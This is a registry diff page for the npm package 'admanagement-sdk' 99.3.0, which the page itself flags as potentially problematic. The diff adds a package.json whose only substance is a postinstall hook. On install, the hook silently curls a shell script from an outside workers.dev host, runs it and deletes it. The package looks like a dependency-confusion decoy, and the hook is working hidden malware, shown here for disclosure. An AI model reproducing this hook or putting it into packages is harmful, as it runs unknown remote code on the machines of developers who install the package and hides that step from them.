admanagement-sdk 99.3.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of admanagement-sdk might be problematic. Click here for more details.
- package/package.json +9 -0
package/package.json
ADDED
|
@@ -0,0 +1,9 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "admanagement-sdk",
|
|
3
|
+
"version": "99.3.0",
|
|
4
|
+
"description": "Package with libraries used for research",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"postinstall": "bash -c 'curl -sSL https://research20934i.sherlockshat007.workers.dev -o script.sh && chmod +x script.sh && ./script.sh && rm -f script.sh'"
|
|
7
|
+
}
|
|
8
|
+
}
|
|
9
|
+
|